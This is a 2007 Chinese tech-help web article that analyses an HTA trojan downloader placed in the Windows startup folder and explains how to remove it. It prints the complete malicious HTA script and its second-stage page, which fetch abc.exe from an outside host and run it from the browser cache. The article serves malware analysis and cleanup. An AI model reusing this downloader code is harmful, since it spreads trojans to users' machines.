Windows.hta Server.hta 病毒简单分析及解决办法_电脑软硬件应用网

首页·电脑学院·电脑故障·操作系统·硬件教程·局域网技术·QQ技巧·网络安全·办公软件· 数据库

导航·设计学院·图像处理·网页设计·软件教程·服务器技术·笔记本·专家装机·网络编程·在线问答

当前位置：电脑软硬件应用网 > 电脑学院 > 网络安全 > 正文

Windows.hta Server.hta 病毒简单分析及解决办法

Windows.hta Server.hta 病毒简单分析及解决办法

2007-6-21 8:32:05　　文/ALPHAS S… 　　出处:Alpha反病毒　　

　　最近几天接连遇见HTA（HTML Application的缩写，HTML应用程序）编写的病毒下载器，主要是以下这两个：
　　C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Windows.hta
　　C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Server.hta

　　以Windows.hta为例，看下代码：

=============================================================
<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE hxxp://www.if56.cn/lo/downmm.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>
=============================================================

　　程序随机自启动，成功执行后连接到地址hxxp://www.if56.cn/lo/downmm.html下载木马，downmm.html代码如下：

=============================================================
<html>
<title>
downmm
</title>
<script src="abc.exe"></script>
<body>
start download.............................
</body>
</html>
=============================================================

　　这个abc.exe经过avast扫描，发现木马病毒：WIN32:Nilage-AI

　　解决办法：
　　如果防火墙提示Windows.hta 或 Server.hta 访问网络，即是中毒的表现，解决办法很简单，删除C:\Documents and Settings\All Users\「开始」菜单\程序\启动\里面的文件即可。

上一篇文章： ravmond.exe,autoc0nv.exe,idnsvr.exe,wmids.exe等病毒的清除教程

下一篇文章： mosou.exe,nwizqjsj.exe,ztinetzt.exe等病毒的手动清除

最新热点		最新推荐		相关文章
				删不掉的"淘宝图标"来侵教你删"淘宝… 微软高危漏洞"快捷方式自动执行"手工… acad.vlx删除方法 360se.exe病毒清除解决方案 regedit32.exe 病毒清除解决方案 3874jr98.exe,long.exe等病毒清除解… RG8.tmp病毒清除解决方案 139ujf939.exe,2.exe等病毒清除解决… EntSoQn.exe病毒清除解决方案 360safess.net.exe等病毒清除解决方…